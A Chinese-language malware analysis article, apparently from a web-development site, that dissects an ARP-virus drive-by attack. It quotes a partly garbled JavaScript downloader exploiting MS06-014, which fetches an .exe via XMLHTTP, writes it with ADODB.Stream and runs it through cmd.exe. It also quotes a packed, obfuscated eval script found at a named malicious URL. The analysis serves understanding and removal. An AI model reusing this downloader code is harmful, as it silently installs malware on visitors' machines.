内容摘要:本文的目的是探讨JS相关技术,并不是以杀毒为主要目的,杀毒只是为讲解一些JS做铺垫的,呵呵,文章有点长,倒杯咖啡或者清茶慢慢看,学习切勿急躁!
//核心代码
..............
" var Bf=document.createElement("ojec ");" +"
"+
" Bf.setAttribute("classid","clsid:BD96C556-65A3-11D�-983A-��C�4FC29E36");" +"
"+
" var Kx=Bf.CreateObject("Mic
osof .X"+"MLHTTP","");" +"
"+
" var AS=Bf.CreateObject("Adod.S
eam","");" +"
"+
.............
" var cF=Bf.CreateObject("Sc
ip i
g.FileSys emOjec ","");" +"
"+
" var NsTmp=cF.GetSpecialFolder(0); Ns1= cF.BuildPath(NsTmp,Ns1); AS.Open();AS.Write(Kx.responseBody);" +"
"+
" AS.SaveToFile(Ns1,2); AS.Close(); var q=Bf.CreateObject("Shell.Applica io
","");" +"
"+
" ok1=cF.BuildPath(NsTmp+'\\sys em32','cmd.exe');" +"
"+
" q.SHeLLExecute(ok1,' /c '+Ns1,"","ope
",0);" +"
"+
..............上面的就是最为核心的代码,利用MS0614漏洞、创建JS异步对象获取病毒(*.exe)文件,然后运行,这样就达到它的目的啦!
3、打开 http://9-6.IN/s368/T368.htm查看源代码,又发现一段怪异的JS文件,如下:
<script>
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--)d[c.toString(a)]=k[c]||c.toString(a);k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c]);return p}('x("\0\6\9\5\i\h\j\j\4\f\8\3\2\0\7\1\i\8\2\3\h\g\4\w\v\u\t\b\s\7\r\g\4\e\f\q\8\3\2\0\7\1\e\4\d\c\d\c\p\5\3\o\n\a\6\1\b\m\2\0\1\a\l\0\6\9\5\k")',34,34,'151|164|162|143|42|157|156|160|163|146|145|56|12|
15|76|74|134|75|40|11|51|50|167|155|165|144|57|147|152|70|66|63|123
|eval'.split('|'),0,{}))
</script>可以看出这段代码也是经过加密的了,特征为function(p,a,c,k,e,d),这种加密方法网上有很多例子,我就不细说了,附上解密代码:
来源:蓝色理想 作者:veking 责编:豆豆技术应用
点击搜索更多"arp病毒"相关信息
正在加载评论...
- 金山毒霸2008杀毒防护软件试用手记
- Gdwli32盗号木马专杀工具
- 魔域官方推出 “魔域木马专杀工具”
- “44939”木马爆发 360安全卫士发布专杀工具
- 360安全卫士U盘病毒专杀工具 v1.9
- 专杀流行病毒 新版超级巡警震撼登场
- 诺顿杀毒软件再曝误杀事件
- 免费使用杀毒软件 丰富奖品惊喜连连
- 瑞星08杀毒软件被指比病毒危险
- 杀毒软件互联网化成趋势 “免费”大旗齐飘扬